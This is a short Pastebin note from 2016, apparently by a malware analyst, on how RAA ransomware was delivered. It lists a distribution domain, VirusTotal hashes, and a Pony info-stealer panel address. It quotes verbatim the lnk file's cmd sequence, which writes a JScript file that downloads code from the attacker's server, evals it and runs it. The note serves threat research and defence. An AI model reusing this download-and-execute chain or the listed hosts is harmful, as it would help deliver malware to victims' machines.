API tools faq
paste
Advertisement
Antelox

RAA Ransomware note - 06/20/2016

Antelox
Jun 20th, 2016
612
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.91 KB | None | 0 0
raw download clone embed print report
  1. *RAA Ransomware*
  2.  
  3. Server: download-file-mail.com
  4.  
  5. From the server a lnk file can be downloaded which executes the following code to download and execute javascript.
  6.  
  7. lnk commands executed (VT 0/54: https://virustotal.com/en/file/e03b17ee5c7cb5da4e07d3a5b4d84c841b12a89b57f7fb301fac94d014903c57/analysis/):
  8.  
  9. %windir%\system32\cmd.exe /c cd %TEMP%
  10. echo. 2>s.js
  11. echo var r = new ActiveXObject("Msxml2.ServerXMLHTTP.6.0");r.open("GET","http://download-file-mail.com/src/src",false);r.send^(^);var b = r.responseText;eval^(b^);>s.js
  12. start s.js
  13.  
  14. s.js file content (VT 7/55: https://virustotal.com/en/file/ddda0e8dae02ccff662bdbcf87d5b4fdde0f9cb2f27ba922cf5b1d63f6f733c3/analysis/)
  15. https://gist.github.com/Antelox/f9bcb471828d9027b2b8a3c22c8e23b1
  16.  
  17. Pony malware dropped (VT: 13/55):
  18. https://virustotal.com/en/file/3e7950ebc821d0a055c8048baf10a61a667a3f38a94cf65f6b7482650f57087d/analysis/
  19.  
  20. Pony panel:
  21. fgfhfjfkfl.xyz/admin
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!